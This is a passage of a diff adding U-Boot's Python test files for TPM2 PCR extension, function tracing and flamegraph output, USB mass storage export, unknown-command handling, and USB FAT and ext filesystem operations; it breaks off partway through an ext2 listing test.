+ """ + if is_sandbox(u_boot_console): + tpm2_sandbox_init(u_boot_console) + force_init(u_boot_console) + ram = u_boot_utils.find_ram_base(u_boot_console) + + read_pcr = u_boot_console.run_command('tpm2 pcr_read 10 0x%x' % (ram + 0x20)) + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + str = re.findall(r'\d+ known updates', read_pcr)[0] + updates = int(re.findall(r'\d+', str)[0]) + + u_boot_console.run_command('tpm2 pcr_extend 10 0x%x' % ram) + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + + # Read the value back into a different place so we can still use 'ram' as + # our zero bytes + read_pcr = u_boot_console.run_command('tpm2 pcr_read 10 0x%x' % (ram + 0x20)) + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + assert 'f5 a5 fd 42 d1 6a 20 30 27 98 ef 6e d3 09 97 9b' in read_pcr + assert '43 00 3d 23 20 d9 f0 e8 ea 98 31 a9 27 59 fb 4b' in read_pcr + + str = re.findall(r'\d+ known updates', read_pcr)[0] + new_updates = int(re.findall(r'\d+', str)[0]) + assert (updates + 1) == new_updates + + u_boot_console.run_command('tpm2 pcr_extend 10 0x%x' % ram) + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + + read_pcr = u_boot_console.run_command('tpm2 pcr_read 10 0x%x' % (ram + 0x20)) + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + assert '7a 05 01 f5 95 7b df 9c b3 a8 ff 49 66 f0 22 65' in read_pcr + assert 'f9 68 65 8b 7a 9c 62 64 2c ba 11 65 e8 66 42 f5' in read_pcr + + str = re.findall(r'\d+ known updates', read_pcr)[0] + new_updates = int(re.findall(r'\d+', str)[0]) + assert (updates + 2) == new_updates + +@pytest.mark.buildconfigspec('cmd_tpm_v2') +def test_tpm2_cleanup(u_boot_console): + """Ensure the TPM is cleared from password or test related configuration.""" + + force_init(u_boot_console, True) diff --git a/test/py/tests/test_trace.py b/test/py/tests/test_trace.py new file mode 100644 index 00000000000..7c5696ce747 --- /dev/null +++ b/test/py/tests/test_trace.py @@ -0,0 +1,306 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright 2022 Google LLC +# Written by Simon Glass <sjg@chromium.org> + +import os +import pytest +import re + +import u_boot_utils as util + +# This is needed for Azure, since the default '..' directory is not writeable +TMPDIR = '/tmp/test_trace' + +# Decode a function-graph line +RE_LINE = re.compile(r'.*0\.\.\.\.\. 
\s*([0-9.]*): func.*[|](\s*)(\S.*)?([{};])$') + + +def collect_trace(cons): + """Build U-Boot and run it to collect a trace + + Args: + cons (ConsoleBase): U-Boot console + + Returns: + tuple: + str: Filename of the output trace file + int: Microseconds taken for initf_dm according to bootstage + """ + cons.run_command('trace pause') + out = cons.run_command('trace stats') + + # The output is something like this: + # 251,003 function sites + # 1,160,283 function calls + # 0 untracked function calls + # 1,230,758 traced function calls (341538 dropped due to overflow) + # 33 maximum observed call depth + # 15 call depth limit + # 748,268 calls not traced due to depth + # 1,230,758 max function calls + + # Get a dict of values from the output + lines = [line.split(maxsplit=1) for line in out.splitlines() if line] + vals = {key: val.replace(',', '') for val, key in lines} + + assert int(vals['function sites']) > 100000 + assert int(vals['function calls']) > 200000 + assert int(vals['untracked function calls']) == 0 + assert int(vals['maximum observed call depth']) > 30 + assert (vals['call depth limit'] == + cons.config.buildconfig.get('config_trace_call_depth_limit')) + assert int(vals['calls not traced due to depth']) > 100000 + + out = cons.run_command('bootstage report') + # Accumulated time: + # 19,104 dm_r + # 23,078 of_live + # 46,280 dm_f + dm_f_time = [line.split()[0] for line in out.replace(',', '').splitlines() + if 'dm_f' in line] + + # Read out the trace data + addr = 0x02000000 + size = 0x02000000 + out = cons.run_command(f'trace calls {addr:x} {size:x}') + print(out) + fname = os.path.join(TMPDIR, 'trace') + out = cons.run_command( + 'host save hostfs - %x %s ${profoffset}' % (addr, fname)) + return fname, int(dm_f_time[0]) + + +def check_function(cons, fname, proftool, map_fname, trace_dat): + """Check that the 'function' output works + + Args: + cons (ConsoleBase): U-Boot console + fname (str): Filename of trace file + proftool (str): Filename of proftool + map_fname (str): Filename of System.map + trace_dat (str): Filename of output file + """ + out = util.run_and_log( + cons, [proftool, '-t', fname, '-o', trace_dat, '-m', map_fname, + 'dump-ftrace']) + + # Check that trace-cmd can read it + out = util.run_and_log(cons, ['trace-cmd', 'dump', trace_dat]) + + # Tracing meta data in file /tmp/test_trace/trace.dat: + # [Initial format] + # 6 [Version] + # 0 [Little endian] + # 4 [Bytes in a long] + # 4096 [Page size, bytes] + # [Header page, 205 bytes] + # [Header event, 205 bytes] + # [Ftrace format, 3 events] + # [Events format, 0 systems] + # [Kallsyms, 342244 bytes] + # [Trace printk, 0 bytes] + # [Saved command lines, 9 bytes] + # 1 [CPUs with tracing data] + # [6 options] + # [Flyrecord tracing data] + # [Tracing clock] + # [local] global counter uptime perf mono mono_raw boot x86-tsc + assert '[Flyrecord tracing data]' in out + assert '4096 [Page size, bytes]' in out + kallsyms = [line.split() for line in out.splitlines() if 'Kallsyms' in line] + # [['[Kallsyms,', '342244', 'bytes]']] + val = int(kallsyms[0][1]) + assert val > 50000 # Should be at least 50KB of symbols + + # Check that the trace has something useful + cmd = f"trace-cmd report -l {trace_dat} |grep -E '(initf_|initr_)'" + out = util.run_and_log(cons, ['sh', '-c', cmd]) + + # Format: + # u-boot-1 0..... 60.805596: function: initf_malloc + # u-boot-1 0..... 60.805597: function: initf_malloc + # u-boot-1 0..... 60.805601: function: initf_bootstage + # u-boot-1 0..... 
60.805607: function: initf_bootstage + + lines = [line.replace(':', '').split() for line in out.splitlines()] + vals = {items[4]: float(items[2]) for items in lines if len(items) == 5} + base = None + max_delta = 0 + for timestamp in vals.values(): + if base: + max_delta = max(max_delta, timestamp - base) + else: + base = timestamp + + # Check for some expected functions + assert 'initf_malloc' in vals.keys() + assert 'initr_watchdog' in vals.keys() + assert 'initr_dm' in vals.keys() + + # All the functions should be executed within five seconds at most + assert max_delta < 5 + + +def check_funcgraph(cons, fname, proftool, map_fname, trace_dat): + """Check that the 'funcgraph' output works + + Args: + cons (ConsoleBase): U-Boot console + fname (str): Filename of trace file + proftool (str): Filename of proftool + map_fname (str): Filename of System.map + trace_dat (str): Filename of output file + + Returns: + int: Time taken by the first part of the initf_dm() function, in us + """ + + # Generate the funcgraph format + out = util.run_and_log( + cons, [proftool, '-t', fname, '-o', trace_dat, '-m', map_fname, + 'dump-ftrace', '-f', 'funcgraph']) + + # Check that the trace has what we expect + cmd = f'trace-cmd report -l {trace_dat} |head -n 70' + out = util.run_and_log(cons, ['sh', '-c', cmd]) + + # First look for this: + # u-boot-1 0..... 282.101360: funcgraph_entry: 0.004 us | initf_malloc(); + # ... + # u-boot-1 0..... 282.101369: funcgraph_entry: | initf_bootstage() { + # u-boot-1 0..... 282.101369: funcgraph_entry: | bootstage_init() { + # u-boot-1 0..... 282.101369: funcgraph_entry: | dlmalloc() { + # ... + # u-boot-1 0..... 282.101375: funcgraph_exit: 0.001 us | } + # Then look for this: + # u-boot-1 0..... 282.101375: funcgraph_exit: 0.006 us | } + # Then check for this: + # u-boot-1 0..... 
282.101375: funcgraph_entry: 0.000 us | initcall_is_event(); + + expected_indent = None + found_start = False + found_end = False + upto = None + + # Look for initf_bootstage() entry and make sure we see the exit + # Collect the time for initf_dm() + for line in out.splitlines(): + m = RE_LINE.match(line) + if m: + timestamp, indent, func, brace = m.groups() + if found_end: + upto = func + break + elif func == 'initf_bootstage() ': + found_start = True + expected_indent = indent + ' ' + elif found_start and indent == expected_indent and brace == '}': + found_end = True + + # The next function after initf_bootstage() exits should be + # initcall_is_event() + assert upto == 'initcall_is_event()' + + # Now look for initf_dm() and dm_timer_init() so we can check the bootstage + # time + cmd = f"trace-cmd report -l {trace_dat} |grep -E '(initf_dm|dm_timer_init)'" + out = util.run_and_log(cons, ['sh', '-c', cmd]) + + start_timestamp = None + end_timestamp = None + for line in out.splitlines(): + m = RE_LINE.match(line) + if m: + timestamp, indent, func, brace = m.groups() + if func == 'initf_dm() ': + start_timestamp = timestamp + elif func == 'dm_timer_init() ': + end_timestamp = timestamp + break + assert start_timestamp and end_timestamp + + # Convert the time to microseconds + return int((float(end_timestamp) - float(start_timestamp)) * 1000000) + + +def check_flamegraph(cons, fname, proftool, map_fname, trace_fg): + """Check that the 'flamegraph' output works + + This spot checks a few call counts and estimates the time taken by the + initf_dm() function + + Args: + cons (ConsoleBase): U-Boot console + fname (str): Filename of trace file + proftool (str): Filename of proftool + map_fname (str): Filename of System.map + trace_fg (str): Filename of output file + + Returns: + int: Approximate number of microseconds used by the initf_dm() function + """ + + # Generate the flamegraph format + out = util.run_and_log( + cons, [proftool, '-t', fname, '-o', trace_fg, '-m', map_fname, + 'dump-flamegraph']) + + # We expect dm_timer_init() to be called twice: once before relocation and + # once after + look1 = 'initf_dm;dm_timer_init 1' + look2 = 'board_init_r;initcall_run_list;initr_dm_devices;dm_timer_init 1' + found = 0 + with open(trace_fg, 'r') as fd: + for line in fd: + line = line.strip() + if line == look1 or line == look2: + found += 1 + assert found == 2 + + # Generate the timing graph + out = util.run_and_log( + cons, [proftool, '-t', fname, '-o', trace_fg, '-m', map_fname, + 'dump-flamegraph', '-f', 'timing']) + + # Add up all the time spend in initf_dm() and its children + total = 0 + with open(trace_fg, 'r') as fd: + for line in fd: + line = line.strip() + if line.startswith('initf_dm'): + func, val = line.split() + count = int(val) + total += count + return total + +check_flamegraph +@pytest.mark.slow +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('trace') +def test_trace(u_boot_console): + """Test we can build sandbox with trace, collect and process a trace""" + cons = u_boot_console + + if not os.path.exists(TMPDIR): + os.mkdir(TMPDIR) + proftool = os.path.join(cons.config.build_dir, 'tools', 'proftool') + map_fname = os.path.join(cons.config.build_dir, 'System.map') + trace_dat = os.path.join(TMPDIR, 'trace.dat') + trace_fg = os.path.join(TMPDIR, 'trace.fg') + + fname, dm_f_time = collect_trace(cons) + + check_function(cons, fname, proftool, map_fname, trace_dat) + trace_time = check_funcgraph(cons, fname, proftool, map_fname, trace_dat) + + # Check that bootstage 
and funcgraph agree to within 10 microseconds + diff = abs(trace_time - dm_f_time) + print(f'trace_time {trace_time}, dm_f_time {dm_f_time}') + assert diff / dm_f_time < 0.01 + + fg_time = check_flamegraph(cons, fname, proftool, map_fname, trace_fg) + + # Check that bootstage and flamegraph agree to within 30% + # This allows for CI being slow to run + diff = abs(fg_time - dm_f_time) + assert diff / dm_f_time < 0.3 diff --git a/test/py/tests/test_ums.py b/test/py/tests/test_ums.py new file mode 100644 index 00000000000..749b1606235 --- /dev/null +++ b/test/py/tests/test_ums.py @@ -0,0 +1,236 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2015-2016, NVIDIA CORPORATION. All rights reserved. + +# Test U-Boot's "ums" command. The test starts UMS in U-Boot, waits for USB +# device enumeration on the host, reads a small block of data from the UMS +# block device, optionally mounts a partition and performs filesystem-based +# read/write tests, and finally aborts the "ums" command in U-Boot. + +import os +import os.path +import pytest +import re +import time +import u_boot_utils + +""" +Note: This test relies on: + +a) boardenv_* to contain configuration values to define which USB ports are +available for testing. Without this, this test will be automatically skipped. +For example: + +# Leave this list empty if you have no block_devs below with writable +# partitions defined. +env__mount_points = ( + '/mnt/ubtest-mnt-p2371-2180-na', +) + +env__usb_dev_ports = ( + { + 'fixture_id': 'micro_b', + 'tgt_usb_ctlr': '0', + 'host_ums_dev_node': '/dev/disk/by-path/pci-0000:00:14.0-usb-0:13:1.0-scsi-0:0:0:0', + }, +) + +env__block_devs = ( + # eMMC; always present + { + 'fixture_id': 'emmc', + 'type': 'mmc', + 'id': '0', + # The following two properties are optional. + # If present, the partition will be mounted and a file written-to and + # read-from it. If missing, only a simple block read test will be + # performed. + 'writable_fs_partition': 1, + 'writable_fs_subdir': 'tmp/', + }, + # SD card; present since I plugged one in + { + 'fixture_id': 'sd', + 'type': 'mmc', + 'id': '1' + }, +) + +b) udev rules to set permissions on devices nodes, so that sudo is not +required. For example: + +ACTION=="add", SUBSYSTEM=="block", SUBSYSTEMS=="usb", KERNELS=="3-13", MODE:="666" + +(You may wish to change the group ID instead of setting the permissions wide +open. All that matters is that the user ID running the test can access the +device.) + +c) /etc/fstab entries to allow the block device to be mounted without requiring +root permissions. For example: + +/dev/disk/by-path/pci-0000:00:14.0-usb-0:13:1.0-scsi-0:0:0:0-part1 /mnt/ubtest-mnt-p2371-2180-na ext4 noauto,user,nosuid,nodev + +This entry is only needed if any block_devs above contain a +writable_fs_partition value. +""" + +@pytest.mark.buildconfigspec('cmd_usb_mass_storage') +def test_ums(u_boot_console, env__usb_dev_port, env__block_devs): + """Test the "ums" command; the host system must be able to enumerate a UMS + device when "ums" is running, block and optionally file I/O are tested, + and this device must disappear when "ums" is aborted. + + Args: + u_boot_console: A U-Boot console connection. + env__usb_dev_port: The single USB device-mode port specification on + which to run the test. See the file-level comment above for + details of the format. + env__block_devs: The list of block devices that the target U-Boot + device has attached. See the file-level comment above for details + of the format. + + Returns: + Nothing. 
+ """ + + have_writable_fs_partition = 'writable_fs_partition' in env__block_devs[0] + if not have_writable_fs_partition: + # If 'writable_fs_subdir' is missing, we'll skip all parts of the + # testing which mount filesystems. + u_boot_console.log.warning( + 'boardenv missing "writable_fs_partition"; ' + + 'UMS testing will be limited.') + + tgt_usb_ctlr = env__usb_dev_port['tgt_usb_ctlr'] + host_ums_dev_node = env__usb_dev_port['host_ums_dev_node'] + + # We're interested in testing USB device mode on each port, not the cross- + # product of that with each device. So, just pick the first entry in the + # device list here. We'll test each block device somewhere else. + tgt_dev_type = env__block_devs[0]['type'] + tgt_dev_id = env__block_devs[0]['id'] + if have_writable_fs_partition: + mount_point = u_boot_console.config.env['env__mount_points'][0] + mount_subdir = env__block_devs[0]['writable_fs_subdir'] + part_num = env__block_devs[0]['writable_fs_partition'] + host_ums_part_node = '%s-part%d' % (host_ums_dev_node, part_num) + else: + host_ums_part_node = host_ums_dev_node + + test_f = u_boot_utils.PersistentRandomFile(u_boot_console, 'ums.bin', + 1024 * 1024); + if have_writable_fs_partition: + mounted_test_fn = mount_point + '/' + mount_subdir + test_f.fn + + def start_ums(): + """Start U-Boot's ums shell command. + + This also waits for the host-side USB enumeration process to complete. + + Args: + None. + + Returns: + Nothing. + """ + + u_boot_console.log.action( + 'Starting long-running U-Boot ums shell command') + cmd = 'ums %s %s %s' % (tgt_usb_ctlr, tgt_dev_type, tgt_dev_id) + u_boot_console.run_command(cmd, wait_for_prompt=False) + u_boot_console.wait_for(re.compile('UMS: LUN.*[\r\n]')) + fh = u_boot_utils.wait_until_open_succeeds(host_ums_part_node) + u_boot_console.log.action('Reading raw data from UMS device') + fh.read(4096) + fh.close() + + def mount(): + """Mount the block device that U-Boot exports. + + Args: + None. + + Returns: + Nothing. + """ + + u_boot_console.log.action('Mounting exported UMS device') + cmd = ('/bin/mount', host_ums_part_node) + u_boot_utils.run_and_log(u_boot_console, cmd) + + def umount(ignore_errors): + """Unmount the block device that U-Boot exports. + + Args: + ignore_errors: Ignore any errors. This is useful if an error has + already been detected, and the code is performing best-effort + cleanup. In this case, we do not want to mask the original + error by "honoring" any new errors. + + Returns: + Nothing. + """ + + u_boot_console.log.action('Unmounting UMS device') + cmd = ('/bin/umount', host_ums_part_node) + u_boot_utils.run_and_log(u_boot_console, cmd, ignore_errors) + + def stop_ums(ignore_errors): + """Stop U-Boot's ums shell command from executing. + + This also waits for the host-side USB de-enumeration process to + complete. + + Args: + ignore_errors: Ignore any errors. This is useful if an error has + already been detected, and the code is performing best-effort + cleanup. In this case, we do not want to mask the original + error by "honoring" any new errors. + + Returns: + Nothing. 
+ """ + + u_boot_console.log.action( + 'Stopping long-running U-Boot ums shell command') + u_boot_console.ctrlc() + u_boot_utils.wait_until_file_open_fails(host_ums_part_node, + ignore_errors) + + ignore_cleanup_errors = True + try: + start_ums() + if not have_writable_fs_partition: + # Skip filesystem-based testing if not configured + return + try: + mount() + u_boot_console.log.action('Writing test file via UMS') + cmd = ('rm', '-f', mounted_test_fn) + u_boot_utils.run_and_log(u_boot_console, cmd) + if os.path.exists(mounted_test_fn): + raise Exception('Could not rm target UMS test file') + cmd = ('cp', test_f.abs_fn, mounted_test_fn) + u_boot_utils.run_and_log(u_boot_console, cmd) + ignore_cleanup_errors = False + finally: + umount(ignore_errors=ignore_cleanup_errors) + finally: + stop_ums(ignore_errors=ignore_cleanup_errors) + + ignore_cleanup_errors = True + try: + start_ums() + try: + mount() + u_boot_console.log.action('Reading test file back via UMS') + read_back_hash = u_boot_utils.md5sum_file(mounted_test_fn) + cmd = ('rm', '-f', mounted_test_fn) + u_boot_utils.run_and_log(u_boot_console, cmd) + ignore_cleanup_errors = False + finally: + umount(ignore_errors=ignore_cleanup_errors) + finally: + stop_ums(ignore_errors=ignore_cleanup_errors) + + written_hash = test_f.content_hash + assert(written_hash == read_back_hash) diff --git a/test/py/tests/test_unknown_cmd.py b/test/py/tests/test_unknown_cmd.py new file mode 100644 index 00000000000..8fc284a9249 --- /dev/null +++ b/test/py/tests/test_unknown_cmd.py @@ -0,0 +1,13 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2015 Stephen Warren +# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved. + +def test_unknown_command(u_boot_console): + """Test that executing an unknown command causes U-Boot to print an + error.""" + + # The "unknown command" error is actively expected here, + # so error detection for it is disabled. + with u_boot_console.disable_check('unknown_command'): + response = u_boot_console.run_command('non_existent_cmd') + assert('Unknown command \'non_existent_cmd\' - try \'help\'' in response) diff --git a/test/py/tests/test_usb.py b/test/py/tests/test_usb.py new file mode 100644 index 00000000000..fb3d20f0826 --- /dev/null +++ b/test/py/tests/test_usb.py @@ -0,0 +1,626 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +import pytest +import random +import re +import u_boot_utils + +""" +Note: This test doesn't rely on boardenv_* configuration values but it can +change the test behavior. To test USB file system cases (fat32, ext2, ext4), +USB device should be formatted and valid partitions should be created for +different file system, otherwise it may leads to failure. This test will be +skipped if the USB device is not detected. + +For example: + +# Setup env__usb_device_test_skip to not skipping the test. By default, its +# value is set to True. Set it to False to run all tests for USB device. 
+env__usb_device_test_skip = False +""" + +def setup_usb(u_boot_console): + if u_boot_console.config.env.get('env__usb_device_test_skip', True): + pytest.skip('USB device test is not enabled') + +@pytest.mark.buildconfigspec('cmd_usb') +def test_usb_start(u_boot_console): + setup_usb(u_boot_console) + output = u_boot_console.run_command('usb start') + + # if output is empty, usb start may already run as part of preboot command + # re-start the usb, in that case + if not output: + u_boot_console.run_command('usb stop') + output = u_boot_console.run_command('usb start') + + if 'No USB device found' in output: + pytest.skip('No USB controller available') + + if 'Card did not respond to voltage select' in output: + pytest.skip('No USB device present') + + controllers = 0 + storage_device = 0 + obj = re.search(r'\d USB Device\(s\) found', output) + controllers = int(obj.group()[0]) + + if not controllers: + pytest.skip('No USB device present') + + obj = re.search(r'\d Storage Device\(s\) found', output) + storage_device = int(obj.group()[0]) + + if not storage_device: + pytest.skip('No USB storage device present') + + assert 'USB init failed' not in output + assert 'starting USB...' in output + + if 'Starting the controller' in output: + assert 'USB XHCI' in output + + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + return controllers, storage_device + +@pytest.mark.buildconfigspec('cmd_usb') +def test_usb_stop(u_boot_console): + setup_usb(u_boot_console) + output = u_boot_console.run_command('usb stop') + assert 'stopping USB..' in output + + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + + output = u_boot_console.run_command('usb dev') + assert "USB is stopped. Please issue 'usb start' first." in output + +@pytest.mark.buildconfigspec('cmd_usb') +def test_usb_reset(u_boot_console): + setup_usb(u_boot_console) + output = u_boot_console.run_command('usb reset') + + if 'No USB device found' in output: + pytest.skip('No USB controller available') + + if 'Card did not respond to voltage select' in output: + pytest.skip('No USB device present') + + obj = re.search(r'\d USB Device\(s\) found', output) + usb_dev_num = int(obj.group()[0]) + + if not usb_dev_num: + pytest.skip('No USB device present') + + obj = re.search(r'\d Storage Device\(s\) found', output) + usb_stor_num = int(obj.group()[0]) + + if not usb_stor_num: + pytest.skip('No USB storage device present') + + assert 'BUG' not in output + assert 'USB init failed' not in output + assert 'resetting USB...' 
in output + + if 'Starting the controller' in output: + assert 'USB XHCI' in output + + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_usb') +def test_usb_info(u_boot_console): + controllers, storage_device = test_usb_start(u_boot_console) + output = u_boot_console.run_command('usb info') + + num_controller = len(re.findall(': Hub,', output)) + num_mass_storage = len(re.findall(': Mass Storage,', output)) + + assert num_controller == controllers - 1 + assert num_mass_storage == storage_device + + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + + for i in range(0, storage_device + controllers - 1): + output = u_boot_console.run_command('usb info %d' % i) + num_controller = len(re.findall(': Hub,', output)) + num_mass_storage = len(re.findall(': Mass Storage,', output)) + assert num_controller + num_mass_storage == 1 + assert 'No device available' not in output + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_usb') +def test_usb_tree(u_boot_console): + controllers, storage_device = test_usb_start(u_boot_console) + output = u_boot_console.run_command('usb tree') + + num_controller = len(re.findall('Hub', output)) + num_mass_storage = len(re.findall('Mass Storage', output)) + + assert num_controller == controllers - 1 + assert num_mass_storage == storage_device + + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_usb') +@pytest.mark.buildconfigspec('usb_storage') +def test_usb_storage(u_boot_console): + controllers, storage_device = test_usb_start(u_boot_console) + output = u_boot_console.run_command('usb storage') + + obj = re.findall(r'Capacity: (\d+|\d+[\.]?\d)', output) + devices = {} + + for key in range(int(storage_device)): + devices[key] = {} + + for x in range(int(storage_device)): + try: + capacity = float(obj[x].split()[0]) + devices[x]['capacity'] = capacity + print('USB storage device %d capacity is: %g MB' % (x, capacity)) + except ValueError: + pytest.fail('USB storage device capacity not recognized') + + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_usb') +def test_usb_dev(u_boot_console): + controllers, storage_device = test_usb_start(u_boot_console) + output = u_boot_console.run_command('usb dev') + + assert 'no usb devices available' not in output + + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + + devices = {} + + for key in range(int(storage_device)): + devices[key] = {} + + fail = 0 + for x in range(0, storage_device): + devices[x]['detected'] = 'yes' + output = u_boot_console.run_command('usb dev %d' % x) + + if 'Card did not respond to voltage select' in output: + fail = 1 + devices[x]['detected'] = 'no' + + if 'No USB device found' in output: + devices[x]['detected'] = 'no' + + if 'unknown device' in output: + devices[x]['detected'] = 'no' + + assert 'is now current device' in output + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + + if fail: + pytest.fail('USB device not present') + + return devices, controllers, storage_device + +@pytest.mark.buildconfigspec('cmd_usb') +def test_usb_part(u_boot_console): + devices, controllers, storage_device = test_usb_dev(u_boot_console) + if not devices: + pytest.skip('No devices detected') + + u_boot_console.run_command('usb part') + + output = 
u_boot_console.run_command('echo $?') + assert output.endswith('0') + + for i in range(0, storage_device): + if devices[i]['detected'] == 'yes': + u_boot_console.run_command('usb dev %d' % i) + output = u_boot_console.run_command('usb part') + + lines = output.split('\n') + part_fat = [] + part_ext = [] + for line in lines: + obj = re.search(r'(\d)\s+\d+\s+\d+\s+\w+\d+\w+-\d+\s+(\d+\w+)', line) + if obj: + part_id = int(obj.groups()[0]) + part_type = obj.groups()[1] + print('part_id:%d, part_type:%s' % (part_id, part_type)) + + if part_type == '0c' or part_type == '0b' or part_type == '0e': + print('Fat detected') + part_fat.append(part_id) + elif part_type == '83': + print('ext detected') + part_ext.append(part_id) + else: + pytest.fail('Unsupported Filesystem on device %d' % i) + devices[i]['ext4'] = part_ext + devices[i]['ext2'] = part_ext + devices[i]['fat'] = part_fat + + if not part_ext and not part_fat: + pytest.fail('No partition detected on device %d' % i) + + return devices, controllers, storage_device + +@pytest.mark.buildconfigspec('cmd_usb') +@pytest.mark.buildconfigspec('cmd_fat') +def test_usb_fatls_fatinfo(u_boot_console): + devices, controllers, storage_device = test_usb_part(u_boot_console) + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + fs = 'fat' + for x in range(0, int(storage_device)): + if devices[x]['detected'] == 'yes': + u_boot_console.run_command('usb dev %d' % x) + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + output = u_boot_console.run_command('fatls usb %d:%s' % (x, part)) + if 'Unrecognized filesystem type' in output: + partitions.remove(part) + pytest.fail('Unrecognized filesystem') + + if not re.search(r'\d file\(s\), \d dir\(s\)', output): + pytest.fail('%s read failed on device %d' % (fs.upper, x)) + + output = u_boot_console.run_command('fatinfo usb %d:%s' % (x, part)) + string = 'Filesystem: %s' % fs.upper + if re.search(string, output): + pytest.fail('%s FS failed on device %d' % (fs.upper(), x)) + part_detect = 1 + + if not part_detect: + pytest.skip('No %s partition detected' % fs.upper()) + +@pytest.mark.buildconfigspec('cmd_usb') +@pytest.mark.buildconfigspec('cmd_fat') +@pytest.mark.buildconfigspec('cmd_memory') +def test_usb_fatload_fatwrite(u_boot_console): + devices, controllers, storage_device = test_usb_part(u_boot_console) + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + fs = 'fat' + for x in range(0, int(storage_device)): + if devices[x]['detected'] == 'yes': + u_boot_console.run_command('usb dev %d' % x) + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + part_detect = 1 + addr = u_boot_utils.find_ram_base(u_boot_console) + size = random.randint(4, 1 * 1024 * 1024) + output = u_boot_console.run_command('crc32 %x %x' % (addr, size)) + m = re.search('==> (.+?)', output) + if not m: + pytest.fail('CRC32 failed') + expected_crc32 = m.group(1) + + file = '%s_%d' % ('uboot_test', size) + output = u_boot_console.run_command( + '%swrite usb %d:%s %x %s %x' % (fs, x, part, addr, file, size) + ) + assert 'Unable to write' not in output + assert 'Error' not in output + assert 'overflow' not in output + expected_text = '%d bytes written' % size + assert expected_text in output + + alignment = int( + u_boot_console.config.buildconfig.get( + 'config_sys_cacheline_size', 128 + ) + ) + offset = random.randrange(alignment, 
1024, alignment) + output = u_boot_console.run_command( + '%sload usb %d:%s %x %s' % (fs, x, part, addr + offset, file) + ) + assert 'Invalid FAT entry' not in output + assert 'Unable to read file' not in output + assert 'Misaligned buffer address' not in output + expected_text = '%d bytes read' % size + assert expected_text in output + + output = u_boot_console.run_command( + 'crc32 %x $filesize' % (addr + offset) + ) + assert expected_crc32 in output + + if not part_detect: + pytest.skip('No %s partition detected' % fs.upper()) + + return file, size + +@pytest.mark.buildconfigspec('cmd_usb') +@pytest.mark.buildconfigspec('cmd_ext4') +def test_usb_ext4ls(u_boot_console): + devices, controllers, storage_device = test_usb_part(u_boot_console) + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + fs = 'ext4' + for x in range(0, int(storage_device)): + if devices[x]['detected'] == 'yes': + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + u_boot_console.run_command('usb dev %d' % x) + for part in partitions: + output = u_boot_console.run_command('%sls usb %d:%s' % (fs, x, part)) + if 'Unrecognized filesystem type' in output: + partitions.remove(part) + pytest.fail('Unrecognized filesystem') + part_detect = 1 + + if not part_detect: + pytest.skip('No %s partition detected' % fs.upper()) + +@pytest.mark.buildconfigspec('cmd_usb') +@pytest.mark.buildconfigspec('cmd_ext4') +@pytest.mark.buildconfigspec('ext4_write') +@pytest.mark.buildconfigspec('cmd_memory') +def test_usb_ext4load_ext4write(u_boot_console): + devices, controllers, storage_device = test_usb_part(u_boot_console) + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + fs = 'ext4' + for x in range(0, int(storage_device)): + if devices[x]['detected'] == 'yes': + u_boot_console.run_command('usb dev %d' % x) + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + part_detect = 1 + addr = u_boot_utils.find_ram_base(u_boot_console) + size = random.randint(4, 1 * 1024 * 1024) + output = u_boot_console.run_command('crc32 %x %x' % (addr, size)) + m = re.search('==> (.+?)', output) + if not m: + pytest.fail('CRC32 failed') + expected_crc32 = m.group(1) + file = '%s_%d' % ('uboot_test', size) + + output = u_boot_console.run_command( + '%swrite usb %d:%s %x /%s %x' % (fs, x, part, addr, file, size) + ) + assert 'Unable to write' not in output + assert 'Error' not in output + assert 'overflow' not in output + expected_text = '%d bytes written' % size + assert expected_text in output + + offset = random.randrange(128, 1024, 128) + output = u_boot_console.run_command( + '%sload usb %d:%s %x /%s' % (fs, x, part, addr + offset, file) + ) + expected_text = '%d bytes read' % size + assert expected_text in output + + output = u_boot_console.run_command( + 'crc32 %x $filesize' % (addr + offset) + ) + assert expected_crc32 in output + + if not part_detect: + pytest.skip('No %s partition detected' % fs.upper()) + + return file, size + +@pytest.mark.buildconfigspec('cmd_usb') +@pytest.mark.buildconfigspec('cmd_ext2') +def test_usb_ext2ls(u_boot_console): + devices, controllers, storage_device = test_usb_part(u_boot_console) + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + fs = 'ext2' + for x in range(0, int(storage_device)): + if devices[x]['detected'] == 'yes': + u_boot_console.run_command('usb dev %d' % x) + try: + partitions = 
